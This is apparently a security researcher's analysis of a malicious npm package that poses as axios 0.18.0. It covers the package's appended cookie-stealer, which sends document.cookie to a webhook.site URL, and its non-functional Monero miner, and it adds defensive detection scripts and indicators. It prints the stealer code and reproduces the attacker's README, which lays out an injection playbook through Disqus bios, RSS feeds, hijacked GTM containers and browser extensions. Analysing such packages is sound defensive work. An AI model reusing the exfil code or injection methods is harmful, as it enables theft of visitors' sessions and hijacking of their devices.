v018-axios-cdntest: C is for cookie, not cryptojacking

Meme: the Sesame Street cast restyled as an HBO crime drama, Elmo brandishing a pistol — the friendly neighborhood brand packing heat, just like a trusted CDN serving a weapon.

jsDelivr never garbage-collects an old npm version, and v018-axios-cdntest treats that permanence as free, bulletproof hosting for what its README bills a "CDN Poisoning Cryptojacker" — publish once, and a trusted CDN serves that miner-plus-cookie-stealer to every visitor of every site that loads the script.

Package metadata

| Field | Value |
|---|---|
| name | v018-axios-cdntest |
| version | 1.0.2 |
| description | Axios library v0.18.0 with cryptojacker payload |
| main | index.js |
| files | index.js, xmr-min.js |

A miner that mines nothing

The headline payload is the part that doesn't work: xmr-min.js advertises a cryptonight "Stealth Cryptojacker v3.0," but computes a toy multiply-add hash, never starts its Web Worker pool, and POSTs JSON-RPC shares to a stratum TCP port over XHR — so it submits to nothing and mines nothing. The stealth is the only part that works: idle and tab-visibility pausing, a single-injection guard, and a 10% throttle all fire; the mining doesn't.

// "cryptonight" in the banner; a non-crypto multiply-add in the body
function simpleHash(data){
  var h1=0x67452301, h2=0xEFCDAB89, h3=0x98BADCFE, h4=0x10325476;
  for(var i=0;i<data.length;i++){ /* ...add & mix... */ }
  return ((h1*2654435761)>>>0);
}
function sendShare(payload,nonce,hash){
  var xhr=new XMLHttpRequest();
  xhr.open('POST','https://'+POOL,true);  // POOL = 'pool.supportxmr.com:4444' — stratum, not HTTP
  xhr.send(json);                          // fire-and-forget into the void
}

Real axios, real cookie theft

index.js is the genuine axios 0.18.0 bundle with a cookie-exfil snippet appended after its sourcemap comment, shipping every visitor's cookies to a webhook.site bin on page load. The miner pulls that same file from jsDelivr "to look legitimate," so loading it also detonates the cookie grab — one script tag, two payloads.

// appended right after //# sourceMappingURL=axios.min.map
window._axiosExfil=function(){
  var c=document.cookie;
  var u="https://webhook.site/ef6e7978-…?c="+encodeURIComponent(c);
  var x=new XMLHttpRequest(); x.open("GET",u,true); x.send();
};

// xmr-min.js loads index.js from the CDN — which fires the grab above
script.src='https://cdn.jsdelivr.net/npm/v018-axios-cdntest@1.0.2/index.js';

| File | Trait | Evidence |
|---|---|---|
| xmr-min.js | objectives/impact/cryptojacking/miner/context | "cryptonight" + Worker strings (string match, not real crypto) |
| index.js | objectives/collection/stealer/browser | document.cookie read and exfiltrated |
| index.js | objectives/exfiltration/http/query | Cookie sent as a URL query parameter |
| xmr-min.js | objectives/impact/cryptojacking/miner/smart | Activity-aware miner; pauses on document.hidden |
| xmr-min.js | objectives/anti-static/obfuscation/encoding/content | Worker built from a Blob via encoded eval() |
| index.js | objectives/evasion/masquerade/traffic | POST mislabeled application/x-www-form-urlencoded |
| index.js | objectives/exfiltration/oob/endpoint | webhook.site out-of-band collector |
| xmr-min.js | micro-behaviors/communications/http/client/cdn | Script loaded from cdn.jsdelivr.net |
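The two tells described in the last two sections (a payload bolted on after the sourcemap comment of an otherwise genuine bundle, and a document.cookie read feeding an out-of-band URL) are easy to check for statically. The triage script below is an added example, not code from the package or from the original write-up; the three JavaScript samples it scans are constructed stand-ins, not the real index.js or xmr-min.js, and the only page-derived values are the two file hashes from the Indicators table. It reports trailing code after the sourcemap comment, any URL that appears shortly after a cookie read, the miner marker strings the trait table matches on, and whether the file's SHA-256 is one of the listed indicators.

```python
"""Static triage of a JavaScript bundle for an appended payload, cookie
exfiltration and cryptojacker marker strings. Added example; the sample
bundles below are constructed, not the package's actual files."""
import hashlib
import re

# SHA-256 values copied from the Indicators table on this page (hex digests
# of the file bytes; the samples below will not match them).
KNOWN_BAD_SHA256 = {
    "68ca1c801b60f550147c9c8ba54a952c223077c93cd845ef1815ec25f7fa7553": "v018-axios-cdntest index.js",
    "d4e79df98be10a6f358cfd304fe9f0bb4b55226bc79bd132a2032e6138f663c3": "v018-axios-cdntest xmr-min.js",
}

# A minified bundle normally ends with its sourcemap comment; code after it was added later.
SOURCEMAP_RE = re.compile(r"^//[#@]\s*sourceMappingURL=\S+", re.MULTILINE)
URL_RE = re.compile(r"https?://[^\s'\"`]+")
COOKIE_RE = re.compile(r"document\.cookie")
# Strings the trait table above matches on (a string match, not real crypto).
MINER_MARKERS = ("cryptonight", "Worker", "Blob", "document.hidden")


def trailing_after_sourcemap(src: str) -> str:
    """Return whatever follows the last sourcemap comment ('' if none, or nothing follows)."""
    matches = list(SOURCEMAP_RE.finditer(src))
    if not matches:
        return ""
    return src[matches[-1].end():].strip()


def cookie_exfil_urls(src: str, window: int = 400) -> list:
    """URLs that appear within `window` characters after a document.cookie read."""
    urls = []
    for m in COOKIE_RE.finditer(src):
        for u in URL_RE.findall(src[m.start(): m.start() + window]):
            if u not in urls:
                urls.append(u)
    return urls


def triage(src: str) -> dict:
    """Score one JavaScript file and return the evidence plus a list of verdicts."""
    digest = hashlib.sha256(src.encode()).hexdigest()
    trailing = trailing_after_sourcemap(src)
    exfil = cookie_exfil_urls(src)
    markers = [k for k in MINER_MARKERS if k in src]
    verdicts = []
    if digest in KNOWN_BAD_SHA256:
        verdicts.append("known-bad-hash")
    if trailing:
        verdicts.append("appended-payload")
    if exfil:
        verdicts.append("cookie-exfil")
    if len(markers) >= 2:  # one marker alone is common in benign code
        verdicts.append("miner-strings")
    return {
        "sha256": digest,
        "known_bad": KNOWN_BAD_SHA256.get(digest),
        "trailing_payload": trailing,
        "exfil_urls": exfil,
        "miner_markers": markers,
        "verdicts": verdicts,
    }


# Constructed samples (not the package's real files): a clean minified bundle,
# the same bundle with a cookie-exfil function appended after the sourcemap
# comment, and a fragment carrying the miner's marker strings.
CLEAN_BUNDLE = (
    "/* axios v0.18.0 | (c) 2018 */\n"
    "!function(e){e.axios={get:function(u){return fetch(u)}}}(window);\n"
    "//# sourceMappingURL=axios.min.map\n"
)
TAMPERED_BUNDLE = CLEAN_BUNDLE + (
    "window._axiosExfil=function(){var c=document.cookie;"
    'var u="https://webhook.site/PLACEHOLDER-ID?c="+encodeURIComponent(c);'
    'var x=new XMLHttpRequest();x.open("GET",u,true);x.send();};\n'
)
MINER_FRAGMENT = (
    "/* Stealth Cryptojacker v3.0 - cryptonight */\n"
    "var w=new Worker(URL.createObjectURL(new Blob([src])));\n"
    "document.addEventListener('visibilitychange',function(){if(document.hidden)w.postMessage('pause')});\n"
)

if __name__ == "__main__":
    for name, js in (("clean", CLEAN_BUNDLE), ("tampered", TAMPERED_BUNDLE), ("miner", MINER_FRAGMENT)):
        r = triage(js)
        print(f"{name:9s} verdicts={r['verdicts']} exfil={r['exfil_urls']} markers={r['miner_markers']}")
```

Run it against a downloaded bundle by passing the file contents to triage(); the "appended-payload" verdict is the cheapest high-signal check, because a genuine minified library has no reason to carry code after its sourcemap comment.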

The operator's manual

The confidence wasn't in the code — it was in the README shipped beside it: an operator's manual with a revenue model, a self-assigned "4.5/5 confidence score," a ranked injection playbook, and a risk table that frets mainly about Google (reproduced below, abridged where you see …, misspelled "jsdeliver" intact).

Shipped with the package — v018-axios-cdntest@1.0.2 · README.md (abridged)

CDN Poisoning Cryptojacker — Complete Verified Deployment Guide

Overview

This project exploits jsdeliver's policy of never deleting old npm versions to host a persistent Monero mining script. Any website that loads the poisoned package automatically serves the miner to all its visitors.

Revenue model: Passive cryptojacking — $0.50-$3/month per site, zero maintenance.

Confidence score: 4.5/5 (validated via live testing, zero-Google risk strategy)


Verified Test Results

Test 1: jsdeliver Serves Old Package Versions Forever
Invoke-WebRequest -Uri 'https://cdn.jsdelivr.net/npm/lodash@4.17.20/lodash.min.js' -UseBasicParsing

Result: Status 200 OK. jsdeliver serves lodash@4.17.20 (an old version) successfully.

Conclusion: jsdeliver NEVER deletes old package versions. Our poisoned package will persist indefinitely.


Test 2: jsdeliver Serves Our Custom Package
Invoke-WebRequest -Uri 'https://cdn.jsdelivr.net/npm/v018-axios-cdntest@1.0.0/' -UseBasicParsing

Result: Status 200 OK. Our package v018-axios-cdntest@1.0.0 is being served by jsdeliver.


File Structure

cdn-poison/
├── package.json          # npm package definition (v018-axios-cdntest@1.0.0)
├── index.js              # Real axios v0.18.0 (bundled as npm package)
├── xmr-min.js            # Stealth cryptojacker script (main payload, self-contained)
└── poisoned-axios.js     # Standalone poisoned axios with cookie exfil payload

How It Works — Architecture

Target Site (WordPress blog)
       │  Visitor loads page
       ▼
<script src="https://cdn.jsdelivr.net/npm/v018-axios-cdntest@1.0.0/xmr-min.js">
       │  jsdeliver serves xmr-min.js (our package)
       ▼
Embedded pure-JS cryptonight miner runs (10% throttle, 2 threads)
       │  Sends shares to:
       ▼
  pool.supportxmr.com:4444
       ▼
  XMR mined → credited to YOUR wallet


The Cryptojacker Script (xmr-min.js)

Stealth Features
  1. Idle detection: Stops mining after 30 seconds of no user activity (mouse, scroll, keyboard)
  2. Visibility change: Pauses when tab is hidden (document.hidden)
  3. Single injection: Uses window.__xmr_miner_started flag to prevent multiple instances
  4. Throttled to 10% CPU: Doesn't cause noticeable slowdown
Configuration (edit these lines in xmr-min.js)
var WALLET='YOUR_WALLET_ADDRESS_HERE';  // Your Monero wallet address
var POOL='pool.supportxmr.com:4444';    // Mining pool
var THREADS=2;                           // Thread count
var THROTTLE=0.10;                       // CPU throttle (0.10 = 10%)

Deployment Steps

Step 1: Set Your Wallet Address

Open cdn-poison/xmr-min.js and replace var WALLET='YOUR_WALLET_ADDRESS_HERE'; with your actual Monero wallet address.

Step 2: Publish Package to npm
cd cdn-poison
npm login          # Create account at https://www.npmjs.com/ (free)
npm publish        # Publishes as v018-axios-cdntest@1.0.0
Step 3: Inject Into Target Sites (in priority order)
Method A: Disqus Profile Bio Injection ⭐ PRIMARY — Zero Google Risk (RECOMMENDED)
  1. Create a Disqus account with a disposable email, then put this in your profile bio HTML:
    <script src="https://cdn.jsdelivr.net/npm/v018-axios-cdntest@1.0.0/xmr-min.js"><\/script>
  2. Save profile — DONE. One-time setup.

Why best: Infinite scale — one profile = thousands of sites automatically. Zero Google legal exposure.

Method B: RSS Feed Injection ⭐ SECONDARY — Zero Google Risk

Create a feed on rss.com and embed the same <script> tag inside the <description> CDATA block; any WordPress site running WP RSS Aggregator that pulls your feed gets the miner.

Method C: GTM Container Hijack ⭐ BACKUP — Medium Google Risk

Find a Google Tag Manager container ID in a site's source, add a Custom HTML tag loading xmr-min.js on All Pages, and publish. Note: Google can see your container firing — backup only.

Method D: Browser Extension Distribution

Ship a manifest.json whose content_scripts inject xmr-min.js over <all_urls>, then publish on the Chrome Web Store ($5 one-time fee).


Revenue Estimates

Hash rate at 10% throttle: ~0.25 GH/s
Earnings per visitor/day (100 visitors): ~$0.50-3.00
Earnings per site/month: ~$15-90
| Sites | Monthly Revenue (conservative) |
|---|---|
| 100 | $150-450 |
| 1,000 | $1,500-4,500 |
| 5,000 | $7,500-22,500 |

… (Why This Works · Troubleshooting · Quick Reference) …


Risk Assessment

| Risk | Impact | Mitigation |
|---|---|---|
| jsdelivr goes down | Low | Very Low — CDN is used by millions of sites daily |
| Browser flags miner | Low | Medium — 10% throttle, idle detection |
| Site owner detects | Low | Low — script looks like Disqus/CDN component |
| Google legal action | Medium | Low — PRIMARY + SECONDARY methods have ZERO Google exposure |

Verified Status

  • ✅ jsdeliver serves old package versions (lodash@4.17.20 — confirmed)
  • ✅ Zero expenses required ($0 — confirmed)
  • ✅ Passive income model (set-and-forget — confirmed)
— end of README.md —

The miner is dead on arrival, but the cookie grab fires on every page load from a permanent, reputable CDN — for all that planning, the package wants crypto and settles for cookies.
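The README's risk table bets that a site owner will not notice one more script tag from a reputable CDN, and its injection playbook relies on user-supplied HTML (a commenting-platform bio, an aggregated RSS item) being rendered with script tags intact. The inventory below is the site-owner's side of that bet: an added example, not code from the package or the write-up, that walks a rendered page, lists every external script source and flags any jsDelivr npm package the site did not knowingly pin, wherever in the DOM the tag landed. The allowlists and the sample page are assumptions constructed for the example; the only page-derived value is the delivery URL from the Indicators table.

```python
"""Inventory external <script src> tags on a rendered page and flag jsDelivr
npm packages that the site operator never approved. Added example; the
allowlists and the sample HTML are constructed assumptions."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlists: third-party hosts the site operator has approved (matched
# by suffix), and the npm packages the site itself pins on jsDelivr.
ALLOWED_SCRIPT_HOSTS = {"disqus.com", "disquscdn.com"}
ALLOWED_JSDELIVR_PACKAGES = {"lodash"}


class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, wherever it sits in the DOM."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def jsdelivr_package(url: str):
    """Split https://cdn.jsdelivr.net/npm/<name>@<version>/<file> into its parts.
    Handles scoped packages (@scope/name@version); returns None for other URLs."""
    p = urlparse(url)
    if p.netloc.lower() != "cdn.jsdelivr.net":
        return None
    parts = p.path.split("/")
    if len(parts) < 3 or parts[1] != "npm" or not parts[2]:
        return None
    if parts[2].startswith("@") and len(parts) > 3:
        spec, file_parts = parts[2] + "/" + parts[3], parts[4:]
    else:
        spec, file_parts = parts[2], parts[3:]
    name, sep, version = spec.rpartition("@")
    if not name:  # no "@version" suffix (the leading "@" of a scope is not one)
        name, version = spec, "latest"
    return {"name": name, "version": version, "file": "/".join(file_parts)}


def host_allowed(host: str) -> bool:
    return any(host == h or host.endswith("." + h) for h in ALLOWED_SCRIPT_HOSTS)


def audit_page(html: str) -> list:
    """Return one finding per external script that is not on an allowlist."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        host = urlparse(src).netloc.lower()
        if not host:  # same-origin (relative) script: out of scope for this check
            continue
        pkg = jsdelivr_package(src)
        if pkg is not None:
            if pkg["name"] not in ALLOWED_JSDELIVR_PACKAGES:
                findings.append({"src": src, "reason": "unvetted-jsdelivr-package", **pkg})
        elif not host_allowed(host):
            findings.append({"src": src, "reason": "unapproved-third-party-host", "host": host})
    return findings


# Constructed sample: a blog page with its own scripts, a pinned lodash, a
# commenting embed, and two script tags that arrived inside user-supplied HTML
# (a commenter bio and an aggregated feed item). The scoped package is made up.
SAMPLE_PAGE = """<!doctype html><html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/lodash@4.17.20/lodash.min.js"></script>
</head><body>
<div id="disqus_thread"></div>
<script src="https://example-site.disqus.com/embed.js"></script>
<div class="comment-author-bio">Hi! <script src="https://cdn.jsdelivr.net/npm/v018-axios-cdntest@1.0.2/xmr-min.js"></script></div>
<div class="feed-item"><script src="https://cdn.jsdelivr.net/npm/@example-scope/widget@2.0.0/w.js"></script></div>
</body></html>"""

if __name__ == "__main__":
    for f in audit_page(SAMPLE_PAGE):
        print(f["reason"], f["src"])
```

Because the collector looks at tags rather than at where the author expected them, a script tag smuggled in through a bio field or a feed description shows up next to the site's own includes, which is exactly the review a CSP script-src allowlist would otherwise have to enforce at the browser.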

Indicators

| Type | Value |
|---|---|
| Tarball | v018-axios-cdntest-1.0.2.tgz |
| Tarball SHA-256 | 75d203f0cec8ff16969967c3841d243b1166a3049f788e9ebd6160f2705f3260 |
| index.js SHA-256 | 68ca1c801b60f550147c9c8ba54a952c223077c93cd845ef1815ec25f7fa7553 |
| xmr-min.js SHA-256 | d4e79df98be10a6f358cfd304fe9f0bb4b55226bc79bd132a2032e6138f663c3 |
| Delivery URL | https://cdn.jsdelivr.net/npm/v018-axios-cdntest@1.0.2/xmr-min.js |
| Exfil webhook | https://webhook.site/ef6e7978-f936-4664-b3ff-296a250e1735 |
| Mining pool | pool.supportxmr.com:4444 |
| Monero wallet | 44AFFq5kSiGBoZ4NMDwYtN18obc8AemS33DBLWs3H7otXft3XjrpDtQGv7SqSsaBYBb98uNbr2VBBEt7f2wfn3RVGQBEP3A |
